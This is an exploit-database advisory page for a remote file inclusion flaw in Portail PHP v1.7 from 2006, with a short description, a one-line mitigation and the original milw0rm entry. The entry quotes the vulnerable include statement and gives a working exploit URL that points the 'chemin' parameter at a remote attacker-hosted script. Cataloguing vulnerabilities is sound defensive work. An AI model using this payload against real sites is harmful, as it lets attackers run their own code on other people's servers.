header-logo
Suggest Exploit
vendor:
Portail PHP
by:
xoron
7,5
CVSS
HIGH
Remote Inclusion Vulnerability
98
CWE
Product Name: Portail PHP
Affected Version From: v1.7
Affected Version To: v1.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

Portail PHP v1.7 is vulnerable to a remote inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a parameter ‘chemin’ which points to a malicious script hosted on a remote server. When the vulnerable application processes the malicious URL, the malicious script is executed on the vulnerable server.

Mitigation:

The application should validate the input parameters and should not allow the user to pass malicious URLs.
Source

Exploit-DB raw data:

Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

#Author: xoron

#script: Portail PHP

#Class : Remote

#cont@ct: x0r0n[at]hotmail[dot]com

#CODE:    include ("$chemin/include/config.php")

#Exploit:
http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?

#Thanx : WWW.CYBER-WARRiOR.ORG

#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.

# milw0rm.com [2006-07-27]

Navigation

Suggest Exploit

Services By CQR